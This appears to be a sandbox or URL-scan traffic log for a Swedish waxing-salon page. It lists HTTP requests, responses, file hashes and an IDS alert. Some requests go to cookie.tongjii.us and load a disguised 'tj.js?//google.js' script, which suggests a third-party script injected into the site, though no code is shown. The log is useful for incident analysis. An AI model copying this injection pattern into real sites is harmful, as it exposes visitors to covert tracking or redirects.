User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/malmo/vaxning

                                         
                                         106.184.4.142
HTTP/1.1 200 OK
Content-Type: application/json; charset=UTF-8
                                        
Server: nginx
Date: Fri, 30 Jun 2017 15:12:46 GMT
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.6.9
Set-Cookie: iscookiesName=1; expires=Fri, 30-Jun-2017 16:12:46 GMT; Max-Age=3600


--- Additional Info ---
Magic:  ASCII text, with no line terminators
Size:   58
Md5:    213604992811d0287e05f1b6af92d2b6
Sha1:   d4ef6ea20788cd5078286d133b399a3647d3aed9
Sha256: f9f3624e33badc1b935e9f293a212c053b23425af6e5f7da875ebf97972a3d27
                                        
                                            GET /click/cookie.php?names=tb_cps&jsoncallback=jsonp1498835562967&_=1498835564934 HTTP/1.1 
Host: cookie.tongjii.us
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/malmo/vaxning

                                         
                                         106.184.4.142
HTTP/1.1 200 OK
Content-Type: application/json; charset=UTF-8
                                        
Server: nginx
Date: Fri, 30 Jun 2017 15:12:46 GMT
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.6.9
Set-Cookie: iscookiesName=1; expires=Fri, 30-Jun-2017 16:12:46 GMT; Max-Age=3600


--- Additional Info ---
Magic:  ASCII text, with no line terminators
Size:   58
Md5:    c287098dd3c81b701372272ccadcfbb2
Sha1:   814cb561c8c7e13bc5ce32a7b0e481237a68b07c
Sha256: ccb02a81dc0706c036d67ad199262e7a94b7d63c8c07d6a34d5a731979055730
                                        
                                            GET /click/cookie.php?names=sbj_tiao||sbj_jd&jsoncallback=jsonp1498835562966&_=1498835564929 HTTP/1.1 
Host: cookie.tongjii.us
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/malmo/vaxning

                                         
                                         106.184.4.142
HTTP/1.1 200 OK
Content-Type: application/json; charset=UTF-8
                                        
Server: nginx
Date: Fri, 30 Jun 2017 15:12:46 GMT
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.6.9
Set-Cookie: iscookiesName=1; expires=Fri, 30-Jun-2017 16:12:46 GMT; Max-Age=3600


--- Additional Info ---
Magic:  ASCII text, with no line terminators
Size:   58
Md5:    381cb46557b8b65e6f09c145b82abb8a
Sha1:   4847610951b212a72d19b4503eb0bcd3d51c52c4
Sha256: 1f39659c6468e344baa73e36a8871f4d377da068aaef7e9866918c3b0c8fb569
                                        
                                            GET /click/cookie.php?name=sbj_tiao&save=1&jsoncallback=jsonp1498835562969&_=1498835566931 HTTP/1.1 
Host: cookie.tongjii.us
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/malmo/vaxning
Cookie: iscookiesName=1

                                         
                                         106.184.4.142
HTTP/1.1 200 OK
Content-Type: application/json; charset=UTF-8
                                        
Server: nginx
Date: Fri, 30 Jun 2017 15:12:47 GMT
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.6.9
Set-Cookie: iscookiesName=1; expires=Fri, 30-Jun-2017 16:12:47 GMT; Max-Age=3600 sbj_tiao=1; expires=Sat, 01-Jul-2017 03:12:47 GMT; Max-Age=43200 statusName=1; expires=Fri, 30-Jun-2017 16:12:47 GMT; Max-Age=3600


--- Additional Info ---
Magic:  ASCII text, with no line terminators
Size:   22
Md5:    048baf184dce3d20f16620e02e6ca17e
Sha1:   0e83e81c34e357fdb420d7f0b8eeaabfc6ffd460
Sha256: 6a58e41b1e04ce42f992182203a6dbfa0efcc0667541a474bde3e46d7c67f3fc
                                        
                                            GET /click/cookie.php?name=tb_cps&times=6&save=1&jsoncallback=jsonp1498835562970&_=1498835566935 HTTP/1.1 
Host: cookie.tongjii.us
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/malmo/vaxning
Cookie: iscookiesName=1

                                         
                                         106.184.4.142
HTTP/1.1 200 OK
Content-Type: application/json; charset=UTF-8
                                        
Server: nginx
Date: Fri, 30 Jun 2017 15:12:47 GMT
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.6.9
Set-Cookie: iscookiesName=1; expires=Fri, 30-Jun-2017 16:12:47 GMT; Max-Age=3600 tb_cps=1; expires=Fri, 30-Jun-2017 21:12:47 GMT; Max-Age=21600 statusName=1; expires=Fri, 30-Jun-2017 16:12:47 GMT; Max-Age=3600


--- Additional Info ---
Magic:  ASCII text, with no line terminators
Size:   22
Md5:    7ad9fa59bf18cfe60c0ae1f9728caac5
Sha1:   6dfe0650d52a3bba1edcda1c00f6dfee79c37814
Sha256: 6cbae657d3b8fe8df6a26b345dc138997c410e366adbaa1c69877cf8bc7ec534
                                        
                                            GET /tj.js?//google.js?41d12a21b4e1a726d4a651685b118811662033874 HTTP/1.1 
Host: lib.tongjii.us
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/malmo/vaxning
If-Modified-Since: Wed, 28 Jun 2017 00:54:20 GMT
If-None-Match: "5952fe3c-248"

                                         
                                         103.230.122.162
HTTP/1.1 304 Not Modified
                                        
Server: nginx
Date: Fri, 30 Jun 2017 15:10:47 GMT
Last-Modified: Wed, 28 Jun 2017 00:54:20 GMT
Connection: keep-alive
Etag: "5952fe3c-248"


--- Additional Info ---
                                        
                                            GET /iplookup/iplookup.php?format=js&_=1498835567216 HTTP/1.1 
Host: int.dpool.sina.com.cn
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/malmo/vaxning

                                         
                                         180.149.138.197
HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
                                        
Server: Sina
Date: Fri, 30 Jun 2017 15:12:47 GMT
Content-Length: 143
Connection: close
DPOOL_HEADER: tyr106
Set-Cookie: INTDPOOL=cb85cb75f7eb9cc5f37b34f3a3b7fb7e;Path=/
POOLPOOL: intdpool
DPOOL_LB7_HEADER: apollo219


--- Additional Info ---
Magic:  ASCII text, with no line terminators
Size:   143
Md5:    351247e451bbb4433a64a2a0b048b3af
Sha1:   3e58a14d1850dc54f2207daec6ef6e652fde1f03
Sha256: e0aa1b242087dab772bd1b038283611e3de00d8e216d5c090315147255ac4354

Alerts:
  IDS:
    - ET POLICY External IP Lookup sina.com.cn
                                        
                                            GET /t/t?a=25678981&as=379444839&t=1&tk=1&i=1 HTTP/1.1 
Host: track.adtraction.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/malmo/vaxning
Cookie: at_gd=2BB20D247F5BDF032105EB5D9A4D03E11831F5E8

                                         
                                         82.99.30.73
HTTP/1.1 200 OK
Content-Type: text/html
                                        
Server: Apache-Coyote/1.1
CacheControl: no-cache
Pragma: no-cache
Expires: -1
P3P: CP="NOI COR CUR ADM OUR BUS INT STA"
Set-Cookie: at_gd=2BB20D247F5BDF032105EB5D9A4D03E11831F5E8; Domain=.adtraction.com; Expires=Mon, 29-Jun-2020 15:12:47 GMT; Path=/
Content-Length: 19
Date: Fri, 30 Jun 2017 15:12:47 GMT


--- Additional Info ---
Magic:  exported SGML document text
Size:   19
Md5:    b6fbfd52fcf206756b6c7add4a61853f
Sha1:   ebc50d4d8314e9967020c4901674c42e70d80cb4
Sha256: 6183b6668b7275e9f1e3c02b656786035570e76c854a8f307e244dc8254c2cdc
                                        
                                            GET /imp?type(js)pool(450314)a(1978982)307049898 HTTP/1.1 
Host: impse.tradedoubler.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/malmo/vaxning

                                         
                                         52.50.135.241
HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=ISO-8859-1
                                        
Access-Control-Allow-Origin: *
Cache-Control: private, max-age=0
Date: Fri, 30 Jun 2017 15:12:47 GMT
P3P: policyref="http://tracker.tradedoubler.com/w3c/p3p.xml",CP="NOI DSP COR NID CUR OUR NOR"
Pragma: no-cache
Server: TXServerHttp
Set-Cookie: BT=1z11zzQtzWfFNLzZVTDl69zzAx1zByZVTDl69;expires=Sat, 30-Jun-2018 15:12:48 GMT;path=/;domain=.tradedoubler.com PI=1z11z1zQtz1mLi8kz9bU4y1y1PQ06y1eGbyyy233yKCZy25er8eyyy2BLQ;expires=Sat, 30-Jun-2018 15:12:48 GMT;path=/;domain=.tradedoubler.com UI=1z11zzQtz1hXXu6zJWhyAXGC;expires=Sat, 30-Jun-2018 15:12:48 GMT;path=/;domain=.tradedoubler.com PL=1z11zzQtz187aHxz2Ho2yELg4yBdS0yy-3FiO48y33iW0w1;expires=Sat, 30-Jun-2018 15:12:48 GMT;path=/;domain=.tradedoubler.com
Content-Length: 240
Connection: keep-alive


--- Additional Info ---
Magic:  ASCII text, with no line terminators
Size:   240
Md5:    392df98cb12adb9924717f29a85a642b
Sha1:   0a30fc4e04a10c0fd88b8f92f1c03375a7131a53
Sha256: 0f2f95924b9621aaab8e3674683ab67e9a7d3758ebd45848896cd546c5a416d1
                                        
                                            GET /img/Girls_Massage_015223_BW.jpg HTTP/1.1 
Host: www.hudterapeuter.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hudterapeuter.com/styles.css

                                         
                                         195.74.38.68
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Date: Fri, 30 Jun 2017 15:12:47 GMT
Server: Apache
Last-Modified: Wed, 16 Jul 2014 12:55:47 GMT
Etag: "463bd79-3e2cf-4fe4f0b0a7cf6"
Accept-Ranges: bytes
Content-Length: 254671
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Pool-Info: /Common/CloudLinux-cluster-07 10.160.1.7 80


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.02
Size:   254671
Md5:    7e9d1899b2a25bf1938f3193503476f1
Sha1:   69c8bb25bc72efa15e8fc5db6dbffacc44f0beb6
Sha256: 14a08ffd947d50ad3bcc806a338afe6132cf0a9b1668008f9628b3a8b58bd138
                                        
                                            GET /imp?type(js)pool(450314)a(1978982)115778382 HTTP/1.1 
Host: impse.tradedoubler.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/malmo/vaxning
Cookie: BT=1z11zzQtzWfFNLzZVTDl69zzAx1zByZVTDl69; PI=1z11z1zQtz1mLi8kz9bU4y1y1PQ06y1eGbyyy233yKCZy25er8eyyy2BLQ; UI=1z11zzQtz1hXXu6zJWhyAXGC; PL=1z11zzQtz187aHxz2Ho2yELg4yBdS0yy-3FiO48y33iW0w1

                                         
                                         52.50.135.241
HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=ISO-8859-1
                                        
Access-Control-Allow-Origin: *
Cache-Control: private, max-age=0
Date: Fri, 30 Jun 2017 15:12:47 GMT
P3P: policyref="http://tracker.tradedoubler.com/w3c/p3p.xml",CP="NOI DSP COR NID CUR OUR NOR"
Pragma: no-cache
Server: TXServerHttp
Set-Cookie: PI=1z11z1zQtz1mLi8kz9bU4y1y1PQ06y1eGbyyy233yKCZy25er8eyyy2BLQ;expires=Sat, 30-Jun-2018 15:12:48 GMT;path=/;domain=.tradedoubler.com PL=1z11zzQtz187aisz2Ho2yELg4yBdS0yy-3FiO48y33iW0w2;expires=Sat, 30-Jun-2018 15:12:48 GMT;path=/;domain=.tradedoubler.com
Content-Length: 240
Connection: keep-alive


--- Additional Info ---
Magic:  ASCII text, with no line terminators
Size:   240
Md5:    392df98cb12adb9924717f29a85a642b
Sha1:   0a30fc4e04a10c0fd88b8f92f1c03375a7131a53
Sha256: 0f2f95924b9621aaab8e3674683ab67e9a7d3758ebd45848896cd546c5a416d1
                                        
                                            GET /t/t?a=60665269&as=379444839&t=1&tk=0&trt=2 HTTP/1.1 
Host: track.adtraction.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/malmo/vaxning
Cookie: at_gd=2BB20D247F5BDF032105EB5D9A4D03E11831F5E8

                                         
                                         82.99.30.73
HTTP/1.1 200 OK
Content-Type: text/html
                                        
Server: Apache-Coyote/1.1
CacheControl: no-cache
Pragma: no-cache
Expires: -1
P3P: CP="NOI COR CUR ADM OUR BUS INT STA"
Set-Cookie: at_gd=2BB20D247F5BDF032105EB5D9A4D03E11831F5E8; Domain=.adtraction.com; Expires=Mon, 29-Jun-2020 15:12:48 GMT; Path=/
Content-Length: 19
Date: Fri, 30 Jun 2017 15:12:48 GMT


--- Additional Info ---
Magic:  exported SGML document text
Size:   19
Md5:    b6fbfd52fcf206756b6c7add4a61853f
Sha1:   ebc50d4d8314e9967020c4901674c42e70d80cb4
Sha256: 6183b6668b7275e9f1e3c02b656786035570e76c854a8f307e244dc8254c2cdc
                                        
                                            GET /bilder/gymgrossisten/TD/bs_140x350.gif HTTP/1.1 
Host: www.gymgrossisten.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/malmo/vaxning

                                         
                                         104.123.147.187
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Server: Apache
Etag: "5eb1946de8b76ed4faa6fff311a5b582:1483950069"
Last-Modified: Mon, 09 Jan 2017 08:21:09 GMT
Accept-Ranges: bytes
Content-Length: 33079
Date: Fri, 30 Jun 2017 15:12:48 GMT
Connection: keep-alive


--- Additional Info ---
Magic:  GIF image data, version 89a, 140 x 350
Size:   33079
Md5:    5eb1946de8b76ed4faa6fff311a5b582
Sha1:   8950df3523ad121924cfbff594201cd9386af0d1
Sha256: f9920db9a3a329a4e1e4f5010f9e5afbf52a3f2d4b32e9b2868b4303d4ef3aa3
                                        
                                            GET /ga.js HTTP/1.1 
Host: www.google-analytics.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/malmo/vaxning

                                         
                                         216.58.211.142
HTTP/1.1 200 OK
Content-Type: text/javascript
                                        
Strict-Transport-Security: max-age=10886400; includeSubDomains; preload
Timing-Allow-Origin: *
Date: Fri, 30 Jun 2017 13:32:07 GMT
Expires: Fri, 30 Jun 2017 15:32:07 GMT
Last-Modified: Tue, 06 Jun 2017 00:25:39 GMT
X-Content-Type-Options: nosniff
Vary: Accept-Encoding
Content-Encoding: gzip
Server: Golfe2
Content-Length: 16022
Cache-Control: public, max-age=7200
Age: 6041


--- Additional Info ---
Magic:  gzip compressed data, max compression
Size:   16022
Md5:    09889dfa1a6bf800507b7a6799c45901
Sha1:   51b1c3f117a0874b6e5ea58bf9e8863c918db4aa
Sha256: 1c92948832be823e16d40195f5f66135368b5cb3f8a7833c3e25f558f16fecfb
                                        
                                            GET /r/__utm.gif?utmwv=5.6.7&utms=1&utmn=680843561&utmhn=hudterapeuter.com&utmcs=UTF-8&utmsr=1176x885&utmvp=1159x737&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=10.0%20r45&utmdt=Hudbehandlingar%20inom%20vaxning%20i%20Malm%C3%B6%20av%20hudterapeuter.&utmhid=347902094&utmr=-&utmp=%2Fmalmo%2Fvaxning&utmht=1498835569320&utmac=UA-8590313-3&utmcc=__utma%3D105502362.928101206.1498835569.1498835569.1498835569.1%3B%2B__utmz%3D105502362.1498835569.1.1.utmcsr%3D(direct)%7Cutmccn%3D(direct)%7Cutmcmd%3D(none)%3B&utmjid=1327966859&utmredir=1&utmu=DAAAAAAAAAAAAAAAAAAAAAAE~ HTTP/1.1 
Host: www.google-analytics.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://hudterapeuter.com/malmo/vaxning

                                         
                                         216.58.211.142
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Access-Control-Allow-Origin: *
Date: Fri, 30 Jun 2017 15:12:49 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate
Last-Modified: Sun, 17 May 1998 03:00:00 GMT
X-Content-Type-Options: nosniff
Server: Golfe2
Content-Length: 35


--- Additional Info ---
Magic:  GIF image data, version 89a, 1 x 1
Size:   35
Md5:    28d6814f309ea289f847c69cf91194c6
Sha1:   0f4e929dd5bb2564f7ab9c76338e04e292a42ace
Sha256: 8337212354871836e6763a41e615916c89bac5b3f1f0adf60ba43c7c806e1015
                                        
                                            GET /favicon.ico HTTP/1.1 
Host: hudterapeuter.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: PHPSESSID=unjgabmep56956jermppv9kah7; __utma=105502362.928101206.1498835569.1498835569.1498835569.1; __utmb=105502362.1.10.1498835569; __utmc=105502362; __utmz=105502362.1498835569.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1

                                         
                                         195.74.38.68
HTTP/1.1 404 Not Found
Content-Type: text/html
                                        
Date: Fri, 30 Jun 2017 15:12:52 GMT
Server: Apache
X-Powered-By: PHP/5.3.29
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Transfer-Encoding: chunked
Pool-Info: /Common/CloudLinux-cluster-07 10.160.1.7 80


--- Additional Info ---
Magic:  UTF-8 Unicode HTML document text
Size:   10686
Md5:    69f7e10f93efcddae55ceb77f225c1c6
Sha1:   51df6f20068bd672dd975afa5f695904b589e4c2
Sha256: 5049d3ea5116bc22738fa2b04aa85c91def839d36d35f6404d01ba5c7173bd4f
                                        
                                            GET /favicon.ico HTTP/1.1 
Host: hudterapeuter.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: PHPSESSID=unjgabmep56956jermppv9kah7; __utma=105502362.928101206.1498835569.1498835569.1498835569.1; __utmb=105502362.1.10.1498835569; __utmc=105502362; __utmz=105502362.1498835569.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1

                                         
                                         195.74.38.68
HTTP/1.1 404 Not Found
Content-Type: text/html
                                        
Date: Fri, 30 Jun 2017 15:12:49 GMT
Server: Apache
X-Powered-By: PHP/5.3.29
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Transfer-Encoding: chunked
Pool-Info: /Common/CloudLinux-cluster-07 10.160.1.7 80


--- Additional Info ---